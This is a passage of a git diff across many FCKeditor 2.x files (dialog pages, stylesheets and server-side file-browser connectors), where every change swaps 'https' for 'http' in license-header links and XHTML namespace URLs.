http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Table dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Table Properties</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_tablecell.html b/admin/FCKeditor/editor/dialog/fck_tablecell.html index 18d8057..8e50fb4 100755 --- a/admin/FCKeditor/editor/dialog/fck_tablecell.html +++ b/admin/FCKeditor/editor/dialog/fck_tablecell.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Cell properties dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Table Cell Properties</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_template.html b/admin/FCKeditor/editor/dialog/fck_template.html index a25b618..22f4661 100755 --- a/admin/FCKeditor/editor/dialog/fck_template.html +++ b/admin/FCKeditor/editor/dialog/fck_template.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Template selection dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_textarea.html b/admin/FCKeditor/editor/dialog/fck_textarea.html index d55751b..8f39f8f 100755 --- a/admin/FCKeditor/editor/dialog/fck_textarea.html +++ b/admin/FCKeditor/editor/dialog/fck_textarea.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_textfield.html b/admin/FCKeditor/editor/dialog/fck_textfield.html index e6b8ecd..e4eeb40 100755 --- a/admin/FCKeditor/editor/dialog/fck_textfield.html +++ b/admin/FCKeditor/editor/dialog/fck_textfield.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Text field dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/fckdebug.html b/admin/FCKeditor/editor/fckdebug.html index be0224d..2bc173d 100755 --- a/admin/FCKeditor/editor/fckdebug.html +++ b/admin/FCKeditor/editor/fckdebug.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,20 +9,20 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * This is the Debug window. * It automatically popups if the Debug = true in the configuration file. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor Debug Window</title> <meta name="robots" content="noindex, nofollow" /> diff --git a/admin/FCKeditor/editor/fckdialog.html b/admin/FCKeditor/editor/fckdialog.html index 5ca8f8c..4ad4fbb 100755 --- a/admin/FCKeditor/editor/fckdialog.html +++ b/admin/FCKeditor/editor/fckdialog.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * This page is used by all dialog box as the container. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="robots" content="noindex, nofollow" /> diff --git a/admin/FCKeditor/editor/fckeditor.html b/admin/FCKeditor/editor/fckeditor.html index f4f295a..99df8f8 100755 --- a/admin/FCKeditor/editor/fckeditor.html +++ b/admin/FCKeditor/editor/fckeditor.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Main page that holds the editor. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor</title> <meta name="robots" content="noindex, nofollow" /> diff --git a/admin/FCKeditor/editor/fckeditor.original.html b/admin/FCKeditor/editor/fckeditor.original.html index 5477b77..f19ea88 100755 --- a/admin/FCKeditor/editor/fckeditor.original.html +++ b/admin/FCKeditor/editor/fckeditor.original.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Main page that holds the editor. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor</title> <meta name="robots" content="noindex, nofollow" /> diff --git a/admin/FCKeditor/editor/filemanager/browser/default/browser.css b/admin/FCKeditor/editor/filemanager/browser/default/browser.css index 9fc24c1..d2abad3 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/browser.css +++ b/admin/FCKeditor/editor/filemanager/browser/default/browser.css @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/browser.html b/admin/FCKeditor/editor/filemanager/browser/default/browser.html index f259851..c0ee0ec 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/browser.html +++ b/admin/FCKeditor/editor/filemanager/browser/default/browser.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/basexml.asp b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/basexml.asp index 6bc8f12..a928de8 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/basexml.asp +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/basexml.asp @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/class_upload.asp b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/class_upload.asp index 7a576ac..3066bdd 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/class_upload.asp +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/class_upload.asp @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/commands.asp b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/commands.asp index 92908c1..a9198b5 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/commands.asp +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/commands.asp @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/config.asp b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/config.asp index 3cd5af0..c559916 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/config.asp +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/config.asp @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp index bced817..0f64f9b 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp @@ -4,7 +4,7 @@ Option Explicit Response.Buffer = True %> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -13,13 +13,13 @@ Response.Buffer = True * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/io.asp b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/io.asp index 70526f2..ca2accd 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/io.asp +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/io.asp @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/util.asp b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/util.asp index 7bafdd5..dc07c93 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/util.asp +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/util.asp @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx b/admin/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx index f629a0f..c80af38 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx @@ -1,6 +1,6 @@ <%@ Page language="c#" Trace="false" Inherits="FredCK.FCKeditorV2.FileBrowserConnector" AutoEventWireup="false" %> <%-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -26,5 +26,5 @@ * include that DLL in your "bin" directory. * * To download the FCKeditor.Net package, go to our official web site: - * https://www.fckeditor.net + * http://www.fckeditor.net --%> \ No newline at end of file diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/cfm/config.cfm b/admin/FCKeditor/editor/filemanager/browser/default/connectors/cfm/config.cfm index a52d9da..e2dd979 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/cfm/config.cfm +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/cfm/config.cfm @@ -1,6 +1,6 @@ <cfsetting enablecfoutputonly="Yes"> <!--- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == ---> diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm b/admin/FCKeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm index f2f4ec6..7651f61 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm @@ -1,6 +1,6 @@ <cfsetting enablecfoutputonly="yes" showdebugoutput="no"> <!--- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/lasso/config.lasso b/admin/FCKeditor/editor/filemanager/browser/default/connectors/lasso/config.lasso index 0f373b6..eef992f 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/lasso/config.lasso +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/lasso/config.lasso @@ -1,6 +1,6 @@ [//lasso /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/lasso/connector.lasso b/admin/FCKeditor/editor/filemanager/browser/default/connectors/lasso/connector.lasso index ffe8759..ec6863b 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/lasso/connector.lasso +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/lasso/connector.lasso @@ -1,6 +1,6 @@ [//lasso /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/basexml.pl b/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/basexml.pl index e1861a0..f74a567 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/basexml.pl +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/basexml.pl @@ -1,5 +1,5 @@ ##### -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -8,13 +8,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/commands.pl b/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/commands.pl index b0ba076..2825c99 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/commands.pl +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/commands.pl @@ -1,5 +1,5 @@ ##### -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -8,13 +8,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # diff --git a/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/connector.cgi b/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/connector.cgi index 301a248..d3d4cfa 100755 --- a/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/connector.cgi +++ b/admin/FCKeditor/editor/filemanager/browser/default/connectors/perl/connector.cgi @@ -1,7 +1,7 @@ #!/usr/bin/env perl ##### -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -10,13 +10,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# 